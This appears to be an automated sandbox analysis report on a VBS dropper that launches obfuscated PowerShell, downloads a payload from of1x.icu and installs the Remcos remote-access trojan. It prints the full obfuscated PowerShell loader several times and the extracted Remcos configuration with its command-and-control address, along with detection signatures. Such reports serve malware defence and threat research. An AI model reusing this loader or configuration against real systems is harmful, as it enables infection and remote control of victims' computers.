              Timestamp: 2024-12-19T07:52:55.719199+0100 | SID: 2803270 | Severity: 2 | Classtype: Potentially Bad Traffic | Source IP: 192.168.2.6 | Source Port: 49820 | Destination IP: 104.21.86.72 | Destination Port: 443 | Protocol: TCP


              AV Detection

              Source: 00000008.00000002.2719001043.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["154.216.20.209:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-BNP8PO", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: Brooming.vbs | ReversingLabs: Detection: 13%
              Source: Yara match | File source: 00000008.00000002.2719001043.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.6% probability
              Source: unknown | HTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.6:49731 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.6:49820 version: TLS 1.2
              Source: Binary string: msiexec.pdb source: msiexec.exe, msiexec.exe, 00000008.00000003.2717481925.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, remcos.exe
              Source: Binary string: msiexec.pdbGCTL source: msiexec.exe, 00000008.00000003.2717481925.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2612607332.0000000007E10000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2244688991.00000263E8771000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2248116940.00000263E8971000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdbvs source: powershell.exe, 00000004.00000002.2606853141.0000000006DC2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb52G source: powershell.exe, 00000004.00000002.2606853141.0000000006D81000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.2606853141.0000000006D81000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              Source: Malware configuration extractor | IPs: 154.216.20.209
              Source: Joe Sandbox View | ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo
              Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49820 -> 104.21.86.72:443
              Source: global traffic | HTTP traffic detected: GET /pnTClIjB/Shotstar.psd HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: of1x.icu | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /SPJvBNUT/VgfkXiQUJNREEqCxjfN242.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: of1x.icu | Cache-Control: no-cache
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic | DNS traffic detected: DNS query: of1x.icu
              Source: powershell.exe, 00000004.00000002.2606853141.0000000006CF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro(
              Source: powershell.exe, 00000002.00000002.2406245717.0000018221C20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.2373287190.0000018213869000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://of1x.icu
              Source: powershell.exe, 00000004.00000002.2584517937.0000000004447000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2373287190.0000018211BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2584517937.00000000042F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2584517937.0000000004447000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.2373287190.0000018211BB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.2584517937.00000000042F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.2584517937.0000000004447000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2373287190.000001821272F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2406245717.0000018221C20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2599993582.0000000005358000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.i
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.ic
              Source: powershell.exe, 00000002.00000002.2373287190.000001821351D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2373287190.0000018211DD6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://of1x.icu
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/p
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pn
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnT
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTC
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTCl
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClI
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIj
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/S
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Sh
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Sho
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shot
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shots
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotst
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotsta
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotstar
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotstar.
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotstar.p
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotstar.ps
              Source: powershell.exe, 00000002.00000002.2373287190.000001821312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotstar.psd
              Source: powershell.exe, 00000002.00000002.2373287190.0000018211DD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotstar.psdP
              Source: powershell.exe, 00000004.00000002.2584517937.0000000004447000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://of1x.icu/pnTClIjB/Shotstar.psdXRMl$
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.6:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.86.72:443 -> 192.168.2.6:49820 version: TLS 1.2

              E-Banking Fraud

              Source: Yara match | File source: 00000008.00000002.2719001043.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              Source: amsi32_2704.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Initial file | Call Thionyl.ShellExecute( "p" + Pockmarking,Doctored & Dorsiflex & Doctored ,"","",0)
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL 
CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cer
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL 
CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_003863E3 GetVersionExW,GetCurrentProcess,NtQueryInformationProcess,GetCommandLineW,GetStdHandle,GetFileType,memset,memset,RegQueryValueExW,RegCloseKey,RegQueryValueExW,RegCloseKey,CompareStringW,CompareStringW,CompareStringW,memset,GlobalFree,lstrlenW,GlobalFree,CoInitialize,CoRegisterClassObject,GetCurrentThread,OpenThreadToken,GetLastError,OpenEventW,WaitForSingleObject,CloseHandle,RevertToSelf,RegCloseKey,RegEnumKeyW,RevertToSelf,GetCurrentProcess,OpenProcessToken,GetTokenInformation,EqualSid,CloseHandle,GetLastError,memset,CloseHandle,MakeAbsoluteSD,GetLastError,CloseHandle,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TranslateMessage,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,CloseHandle,GetLastError,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CoRevokeClassObject,CoUninitialize,GetLastError,GetMessageW,TranslateMessage,DispatchMessageW | 10_2_003863E3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3464B8C2 | 2_2_00007FFD3464B8C2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3464AB13 | 2_2_00007FFD3464AB13
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3464C4A0 | 2_2_00007FFD3464C4A0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3464363D | 2_2_00007FFD3464363D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34643A35 | 2_2_00007FFD34643A35
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_0278E928 | 4_2_0278E928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_0278F1F8 | 4_2_0278F1F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_0278E5E0 | 4_2_0278E5E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_0278192D | 4_2_0278192D
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_3_00CBC073 | 8_3_00CBC073
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_3_00CC3E0D | 8_3_00CC3E0D
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_3_00CC3BE3 | 8_3_00CC3BE3
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_3_00CC35BD | 8_3_00CC35BD
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_3_00CC3D49 | 8_3_00CC3D49
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_003863E3 | 10_2_003863E3
              Source: Brooming.vbs | Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 5893
              Source: unknown | Process created: Commandline size = 5893
              Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 5893
              Source: amsi32_2704.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@12/8@1/2
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_00382F93 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle | 10_2_00382F93
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_00387DD0 StartServiceCtrlDispatcherW,GetLastError | 10_2_00387DD0
              Source: C:\ProgramData\Remcos\remcos.exe | Code function: 10_2_00387DD0 StartServiceCtrlDispatcherW,GetLastError | 10_2_00387DD0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Knapmagerens.Stu
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-BNP8PO
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_haiygd0u.zhj.ps1
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3664
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2704
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: Brooming.vbs | ReversingLabs: Detection: 13%
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger 